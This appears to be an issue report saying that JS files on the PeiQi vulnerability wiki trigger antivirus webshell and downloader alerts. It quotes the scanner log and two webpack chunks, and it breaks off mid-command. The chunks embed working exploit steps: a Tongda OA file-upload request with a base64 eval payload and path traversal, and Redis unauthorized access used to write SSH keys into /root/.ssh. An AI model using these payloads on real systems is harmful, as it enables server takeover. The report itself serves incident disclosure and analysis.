PeiQi文库

PeiQi文库是一个技术文档库,包含各种漏洞利用和攻击技术的详细说明。

issue #2635 推荐资源页面中的链接“PeiQi文库”包含恶意攻击载荷:
http://wiki.peiqi.tech/assets/js/9.2369a4c5.js
http://wiki.peiqi.tech/assets/js/113.e7ee5e11.js
http://wiki.peiqi.tech/assets/js/408.6bd2b286.js
火绒安全日志如下:
```text
【3】2022-09-25 21:41:23,病毒防护,WEB扫描,发现病毒TrojanDownloader/PS.NetLoader.aw, 已阻止
病毒名称:TrojanDownloader/PS.NetLoader.aw
病毒ID:53F2750F99F235F6
病毒URL:http://wiki.peiqi.tech/assets/js/9.2369a4c5.js
操作结果:已阻止
进程ID:18156
操作进程:C:\Program Files\Google\Chrome\Application\chrome.exe
操作进程命令行:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=zh-CN --service-sandbox-type=none --mojo-platform-channel-handle=2380 --field-trial-handle=2196,i,3598864850642461159,7124751335540957748,131072 /prefetch:8
操作进程校验和:9037711d20353f0adec0c4558a77f6277dab778b
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【4】2022-09-25 21:41:05,病毒防护,WEB扫描,发现病毒HEUR:Backdoor/PHP.WebShell.d, 已阻止
病毒名称:HEUR:Backdoor/PHP.WebShell.d
病毒ID:38B63BB3B1F6D704
病毒URL:http://wiki.peiqi.tech/assets/js/408.6bd2b286.js
操作结果:已阻止
进程ID:18156
操作进程:C:\Program Files\Google\Chrome\Application\chrome.exe
操作进程命令行:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=zh-CN --service-sandbox-type=none --mojo-platform-channel-handle=2380 --field-trial-handle=2196,i,3598864850642461159,7124751335540957748,131072 /prefetch:8
操作进程校验和:9037711d20353f0adec0c4558a77f6277dab778b
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
【5】2022-09-25 21:40:34,病毒防护,WEB扫描,发现病毒HEUR:Backdoor/PHP.WebShell.a, 已阻止
病毒名称:HEUR:Backdoor/PHP.WebShell.a
病毒ID:ED9F80E4A8E762B9
病毒URL:http://wiki.peiqi.tech/assets/js/113.e7ee5e11.js
操作结果:已阻止
进程ID:18156
操作进程:C:\Program Files\Google\Chrome\Application\chrome.exe
操作进程命令行:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=zh-CN --service-sandbox-type=none 
--mojo-platform-channel-handle=2380 --field-trial-handle=2196,i,3598864850642461159,7124751335540957748,131072 /prefetch:8操作进程校验和:9037711d20353f0adec0c4558a77f6277dab778b>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> http://wiki.peiqi.tech/assets/js/113.e7ee5e11.js内容如下:text
/*
 * webpack JSONP chunk 113 of the wiki.peiqi.tech site, quoted here as evidence for the
 * scanner hit on 113.e7ee5e11.js (entry 【5】 above, HEUR:Backdoor/PHP.WebShell.a).
 * It registers five modules: 1737-1740 each export one image URL built from the bundle
 * public path `s.p` (presumably the site's asset base), and 2828 is a compiled Vue render
 * function for the page titled "通达OA v11.8 api.ali.php 任意文件上传漏洞".
 * Everything exploit-shaped in this chunk - the multipart HTTP request, the base64 blob,
 * `eval(base64_decode(...))`, `file_put_contents(...)` - occurs only inside string
 * literals handed to `t._v(...)` next to element nodes such as `r("p", ...)`, i.e. it
 * appears to be rendered page text, not code this chunk runs. Apart from requiring
 * module 75 (`s(75)`, defined in another chunk not shown here) the chunk contains no
 * eval, Function, DOM/script injection or network call of its own, so the detection is
 * consistent with a signature match on those literals rather than on executable code.
 * A served asset can change after the fact, so re-fetch the URL and diff it against this
 * copy before treating the report as resolved.
 */
(window.webpackJsonp=window.webpackJsonp||[]).push([[113],{/* modules 1737-1740: image asset URL exports */1737:function(t,a,s){t.exports=s.p+"assets/img/1628303888717-4ffc91a6-e87e-4e00-8bd5-b2218bb0772a.70c7bdb3.png"},1738:function(t,a,s){t.exports=s.p+"assets/img/1630513004438-e5a73ef6-8d65-40a1-9a3c-3be30cd7d164.da74a076.png"},1739:function(t,a,s){t.exports=s.p+"assets/img/1630513044174-8139c404-4f11-404e-be04-42d86b407bdd.420a6145.png"},1740:function(t,a,s){t.exports=s.p+"assets/img/1630513283771-36cc86c7-a150-4834-be64-243b20938165.83dcea54.png"},/* module 2828: page component; the render function below only builds DOM nodes, all payload-like text is inside string literals */2828:function(t,a,s){"use strict";s.r(a);var r=s(75),n=Object(r.a)({},(function(){var t=this,a=t.$createElement,r=t._self._c||a;return r("ContentSlotsDistributor",{attrs:{"slot-key":t.$parent.slotKey}},[r("h1",{attrs:{id:"通达oa-v11-8-api-ali-php-任意文件上传漏洞"}},[r("a",{staticClass:"header-anchor",attrs:{href:"#通达oa-v11-8-api-ali-php-任意文件上传漏洞"}},[t._v("#")]),t._v(" 通达OA v11.8 api.ali.php 任意文件上传漏洞")]),t._v(" "),r("h2",{attrs:{id:"漏洞描述"}},[r("a",{staticClass:"header-anchor",attrs:{href:"#漏洞描述"}},[t._v("#")]),t._v(" 漏洞描述")]),t._v(" "),r("p",[t._v("通达OA v11.8 api.ali.php 存在任意文件上传漏洞,攻击者通过漏可以上传恶意文件控制服务器")]),t._v(" "),r("h2",{attrs:{id:"漏洞影响"}},[r("a",{staticClass:"header-anchor",attrs:{href:"#漏洞影响"}},[t._v("#")]),t._v(" 漏洞影响")]),t._v(" "),r("a-checkbox",{attrs:{checked:""}},[t._v("通达OA v11.8")]),r("br"),t._v(" "),r("h2",{attrs:{id:"漏洞复现"}},[r("a",{staticClass:"header-anchor",attrs:{href:"#漏洞复现"}},[t._v("#")]),t._v(" 漏洞复现")]),t._v(" "),r("p",[t._v("登陆页面")]),t._v(" "),r("p",[r("img",{attrs:{src:s(1737),alt:"img"}})]),t._v(" "),r("p",[t._v("像 api.ali.php 发送请求包")]),t._v(" "),r("div",{staticClass:"language-python 
line-numbers-mode"},[r("pre",{pre:!0,attrs:{class:"language-python"}},[r("code",[t._v("POST "),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),t._v("mobile"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),t._v("api"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),t._v("api"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),t._v("ali"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),t._v("php HTTP"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),r("span",{pre:!0,attrs:{class:"token number"}},[t._v("1.1")]),t._v("\nHost"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(":")]),t._v(" \nUser"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("Agent"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(":")]),t._v(" Go"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("http"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("client"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),r("span",{pre:!0,attrs:{class:"token number"}},[t._v("1.1")]),t._v("\nContent"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("Length"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(":")]),t._v(" "),r("span",{pre:!0,attrs:{class:"token number"}},[t._v("422")]),t._v("\nContent"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("Type"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(":")]),t._v(" multipart"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),t._v("form"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("data"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(";")]),t._v(" boundary"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("=")]),t._v("502f67681799b07e4de6b503655f5cae\nAccept"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("Encoding"),r("span",{pre:!0,attrs:{class:"token 
punctuation"}},[t._v(":")]),t._v(" gzip\n\n"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("502f67681799b07e4de6b503655f5cae\nContent"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("Disposition"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(":")]),t._v(" form"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("data"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(";")]),t._v(" name"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("=")]),r("span",{pre:!0,attrs:{class:"token string"}},[t._v('"file"')]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(";")]),t._v(" filename"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("=")]),r("span",{pre:!0,attrs:{class:"token string"}},[t._v('"fb6790f4.json"')]),t._v("\nContent"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("Type"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(":")]),t._v(" application"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),t._v("octet"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("stream\n\n"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v("{")]),r("span",{pre:!0,attrs:{class:"token string"}},[t._v('"modular"')]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(":")]),r("span",{pre:!0,attrs:{class:"token string"}},[t._v('"AllVariable"')]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(",")]),r("span",{pre:!0,attrs:{class:"token string"}},[t._v('"a"')]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(":")]),r("span",{pre:!0,attrs:{class:"token string"}},[t._v('"ZmlsZV9wdXRfY29udGVudHMoJy4uLy4uL2ZiNjc5MGY0LnBocCcsJzw/cGhwIHBocGluZm8oKTs/PicpOw=="')]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(",")]),r("span",{pre:!0,attrs:{class:"token string"}},[t._v('"dataAnalysis"')]),r("span",{pre:!0,attrs:{class:"token 
punctuation"}},[t._v(":")]),r("span",{pre:!0,attrs:{class:"token string"}},[t._v('"{\"a\":\"錦',$BackData[dataAnalysis] => eval(base64_decode($BackData[a])));/\"}"')]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v("}")]),t._v("\n"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("502f67681799b07e4de6b503655f5cae"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("-")]),t._v("\n")])]),t._v(" "),r("div",{staticClass:"line-numbers-wrapper"},[r("span",{staticClass:"line-number"},[t._v("1")]),r("br"),r("span",{staticClass:"line-number"},[t._v("2")]),r("br"),r("span",{staticClass:"line-number"},[t._v("3")]),r("br"),r("span",{staticClass:"line-number"},[t._v("4")]),r("br"),r("span",{staticClass:"line-number"},[t._v("5")]),r("br"),r("span",{staticClass:"line-number"},[t._v("6")]),r("br"),r("span",{staticClass:"line-number"},[t._v("7")]),r("br"),r("span",{staticClass:"line-number"},[t._v("8")]),r("br"),r("span",{staticClass:"line-number"},[t._v("9")]),r("br"),r("span",{staticClass:"line-number"},[t._v("10")]),r("br"),r("span",{staticClass:"line-number"},[t._v("11")]),r("br"),r("span",{staticClass:"line-number"},[t._v("12")]),r("br"),r("span",{staticClass:"line-number"},[t._v("13")]),r("br")])]),r("a-checkbox",{attrs:{checked:""}},[t._v("参数a base解码")]),r("br"),t._v(" "),r("a-checkbox",{attrs:{checked:""}},[t._v("ZmlsZV9wdXRfY29udGVudHMoJy4uLy4uL2ZiNjc5MGY0LnBocCcsJzw/cGhwIHBocGluZm8oKTs/PicpOw==file_put_contents('../../fb6790f4.php','<?php phpinfo();?>');")]),r("br"),t._v(" "),r("p",[r("img",{attrs:{src:s(1738),alt:"img"}})]),t._v(" "),r("p",[t._v("再发送GET请求写入文件")]),t._v(" "),r("div",{staticClass:"language-python line-numbers-mode"},[r("pre",{pre:!0,attrs:{class:"language-python"}},[r("code",[r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),t._v("inc"),r("span",{pre:!0,attrs:{class:"token 
operator"}},[t._v("/")]),t._v("package"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),t._v("work"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),t._v("php?"),r("span",{pre:!0,attrs:{class:"token builtin"}},[t._v("id")]),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("=")]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),t._v("myoa"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),t._v("attach"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),t._v("approve_center"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),r("span",{pre:!0,attrs:{class:"token number"}},[t._v("2109")]),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("/")]),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("%")]),t._v("3E"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("%")]),t._v("3E"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("%")]),t._v("3E"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("%")]),t._v("3E"),r("span",{pre:!0,attrs:{class:"token 
operator"}},[t._v("%")]),t._v("3E"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("%")]),t._v("3E"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("%")]),t._v("3E"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("%")]),t._v("3E"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("%")]),t._v("3E"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("%")]),t._v("3E"),r("span",{pre:!0,attrs:{class:"token operator"}},[t._v("%")]),t._v("3E"),r("span",{pre:!0,attrs:{class:"token punctuation"}},[t._v(".")]),t._v("fb6790f4\n")])]),t._v(" "),r("div",{staticClass:"line-numbers-wrapper"},[r("span",{staticClass:"line-number"},[t._v("1")]),r("br")])]),r("p",[r("img",{attrs:{src:s(1739),alt:"img"}})]),t._v(" "),r("p",[t._v("其中请求中对 2109 为 年月,路径为 "),r("code",[t._v("/fb6790f4.php,")])]),t._v(" "),r("p",[r("img",{attrs:{src:s(1740),alt:"img"}})])],1)}),[],!1,null,null,null);a.default=n.exports}}]);http://wiki.peiqi.tech/assets/js/9.2369a4c5.js内容如下:text(window.webpackJsonp=window.webpackJsonp||[]).push([[9],{1024:function(s,t,a){s.exports=a.p+"assets/img/1628511265889-a89c273a-fa98-458c-b7d0-8a61b9098cc2-20220415143203556.794335ca.png"},1025:function(s,t,a){s.exports=a.p+"assets/img/1628511872365-61010be1-642a-4a70-8390-1de94a771e5b-20220415143203424.c66d4dbb.png"},1026:function(s,t,a){s.exports=a.p+"assets/img/1628511715038-57addcaa-bed5-4db8-a030-acafc228ba79-20220415143203457.eef9b57a.png"},1027:function(s,t,a){s.exports=a.p+"assets/img/1628512967608-9d62672c-9db3-4b07-94ad-70d03edf02b7-20220415143203434.9897afb6.png"},1028:function(s,t,a){s.exports=a.p+"assets/img/1628513275098-e5bcd6c4-3c19-4aaa-b2c1-90bd3d3b4a4e-20220415143203451.151e7ac3.png"},1029:function(s,t,a){s.exports=a.p+"assets/img/1628514409894-848f4f59-3b45-449a-8566-c204aed32354-20220415143203297.fba85c78.png"},1030:function(s,t,a){s.exports=a.p+"assets/img/1628515307073-5d1f3553-587e-476a-9556-beb3c9eb54bf-20220415143203556.3c3cade0.png"},1031:function(s,t,a){s.exports=a.p+"assets/im
g/1628515979062-1d027d69-3100-4eb9-9496-43b0b15a7768-20220415143203717.9a8e8d57.png"},1032:function(s,t,a){s.exports=a.p+"assets/img/1628603729549-61622428-de4c-4dbf-abdb-7ceb5c0d6240-20220415143203493.808174aa.png"},1033:function(s,t,a){s.exports=a.p+"assets/img/1628608226504-a9981cc4-1dae-4c85-9468-39bd3f030305-20220415143203642.bd3538c3.png"},1034:function(s,t,a){s.exports=a.p+"assets/img/1628608233667-192fed23-55a2-43a8-88df-75cc7d9d0b9b-20220415143203584.357b75de.png"},1035:function(s,t,a){s.exports=a.p+"assets/img/1628609553023-5e320f71-cea1-4ade-ad72-f1e0f51f7f11-20220415143203567.5bb58bce.png"},1036:function(s,t,a){s.exports=a.p+"assets/img/1628609873998-b83c9a14-4307-45fb-8c50-f46b79d85f86-20220415143203676.f3e64db5.png"},1037:function(s,t,a){s.exports=a.p+"assets/img/1628609802263-2105839f-6645-428b-82d4-bbb75b3dadb9-20220415143203681.8b806788.png"},1038:function(s,t,a){s.exports=a.p+"assets/img/1628610432546-2e313488-1ab1-42f2-bf37-fb074693c30a-20220415151326919.eba8b536.png"},1039:function(s,t,a){s.exports=a.p+"assets/img/1628682645780-adbda105-6e56-481d-a4c9-b34e6bd5908b-20220415143203710.60230d0b.png"},2586:function(s,t,a){"use strict";a.r(t);var e=a(75),r=Object(e.a)({},(function(){var s=this,t=s.$createElement,e=s._self._c||t;return e("ContentSlotsDistributor",{attrs:{"slot-key":s.$parent.slotKey}},[e("h1",{attrs:{id:"redis-6379端口"}},[e("a",{staticClass:"header-anchor",attrs:{href:"#redis-6379端口"}},[s._v("#")]),s._v(" Redis 6379端口")]),s._v(" "),e("h2",{attrs:{id:"关于"}},[e("a",{staticClass:"header-anchor",attrs:{href:"#关于"}},[s._v("#")]),s._v(" 关于")]),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("Redis 默认情况下,会绑定在 0.0.0.0:6379,这样将会将 Redis 服务暴露到公网上")]),e("br"),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("如果在没有开启认证的情况下,可以导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。")]),e("br"),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("攻击者在未授权访问 Redis 的情况下可以利用 Redis 的相关方法,可以成功在 Redis 服务器上写入公钥,进而可以使用对应私钥直接登录目标服务器")]),e("br"),s._v(" 
"),e("h2",{attrs:{id:"攻击方法"}},[e("a",{staticClass:"header-anchor",attrs:{href:"#攻击方法"}},[s._v("#")]),s._v(" 攻击方法")]),s._v(" "),e("p",[s._v("要成功的利用Redis未授权访问的漏洞需要如下几点")]),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("redis服务以root账户运行")]),e("br"),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("redis无密码或弱密码进行认证")]),e("br"),s._v(" "),e("a-checkbox",{attrs:{checked:""}},[s._v("redis监听在0.0.0.0公网上或内网中")]),e("br"),s._v(" "),e("p",[s._v("首先可以使用 Nmap的检测脚本 对 Redis进行未授权检测")]),s._v(" "),e("div",{staticClass:"language-php line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-php"}},[e("code",[s._v("nmap "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("A")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("p "),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),s._v(" –script redis"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("info "),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),s._v("\n")])]),s._v(" "),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br")])]),e("p",[s._v("也可以使用其他工具进行扫描")]),s._v(" "),e("p",[e("img",{attrs:{src:a(1024),alt:"img"}})]),s._v(" "),e("p",[s._v("连接数据库查看 info, 确定未授权访问")]),s._v(" "),e("div",{staticClass:"language-php line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-php"}},[e("code",[s._v("redis"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("cli "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("h "),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token 
operator"}},[s._v("-")]),s._v("p "),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),s._v("\n")])]),s._v(" "),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br")])]),e("p",[e("img",{attrs:{src:a(1025),alt:"img"}})]),s._v(" "),e("p",[e("img",{attrs:{src:a(1026),alt:"img"}})]),s._v(" "),e("h2",{attrs:{id:"linux-获取权限"}},[e("a",{staticClass:"header-anchor",attrs:{href:"#linux-获取权限"}},[s._v("#")]),s._v(" Linux 获取权限")]),s._v(" "),e("h3",{attrs:{id:"ssh公钥"}},[e("a",{staticClass:"header-anchor",attrs:{href:"#ssh公钥"}},[s._v("#")]),s._v(" SSH公钥")]),s._v(" "),e("p",[s._v("生成密钥在攻击机中")]),s._v(" "),e("div",{staticClass:"language-php line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-php"}},[e("code",[s._v("ssh"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("keygen "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("t rsa\n")])]),s._v(" "),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br")])]),e("p",[e("img",{attrs:{src:a(1027),alt:"img"}})]),s._v(" "),e("p",[s._v("将公钥导入key.txt文件(前后用\n\n换行,避免和Redis里其他缓存数据混合)")]),s._v(" "),e("div",{staticClass:"language-php line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-php"}},[e("code",[e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("(")]),e("span",{pre:!0,attrs:{class:"token keyword"}},[s._v("echo")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("e "),e("span",{pre:!0,attrs:{class:"token string double-quoted-string"}},[s._v('"\n\n"')]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(";")]),s._v(" cat id_rsa"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(".")]),s._v("pub"),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(";")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token keyword"}},[s._v("echo")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("e 
"),e("span",{pre:!0,attrs:{class:"token string double-quoted-string"}},[s._v('"\n\n"')]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(")")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" key"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(".")]),s._v("txt\n")])]),s._v(" "),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br")])]),e("p",[e("img",{attrs:{src:a(1028),alt:"img"}})]),s._v(" "),e("p",[s._v("再把 key.txt 文件内容写入目标主机的缓冲里")]),s._v(" "),e("div",{staticClass:"language-php line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-php"}},[e("code",[s._v("cat key"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(".")]),e("span",{pre:!0,attrs:{class:"token class-name"}},[s._v("txt")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("|")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token class-name"}},[s._v("redis")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("cli "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("h "),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),s._v(" "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),s._v("x set test \n")])]),s._v(" "),e("div",{staticClass:"line-numbers-wrapper"},[e("span",{staticClass:"line-number"},[s._v("1")]),e("br")])]),e("p",[e("img",{attrs:{src:a(1029),alt:"img"}}),s._v("\n再通过设置参数,写入指定文件")]),s._v(" "),e("div",{staticClass:"language-php line-numbers-mode"},[e("pre",{pre:!0,attrs:{class:"language-php"}},[e("code",[s._v("┌──"),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("(")]),s._v("root💀kali"),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(")")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("-")]),e("span",{pre:!0,attrs:{class:"token 
punctuation"}},[s._v("[")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("~")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("/")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(".")]),s._v("ssh"),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v("]")]),s._v("\n└─"),e("span",{pre:!0,attrs:{class:"token comment"}},[s._v("# redis-cli -h 192.168.0.126 -p 6379")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" config set dir "),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("/")]),s._v("root"),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v("/")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(".")]),s._v("ssh\n"),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("OK")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" config set dbfilename authorized_keys\n"),e("span",{pre:!0,attrs:{class:"token constant"}},[s._v("OK")]),s._v("\n"),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("192.168")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".0")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v(".126")]),e("span",{pre:!0,attrs:{class:"token punctuation"}},[s._v(":")]),e("span",{pre:!0,attrs:{class:"token number"}},[s._v("6379")]),e("span",{pre:!0,attrs:{class:"token operator"}},[s._v(">")]),s._v(" keys 
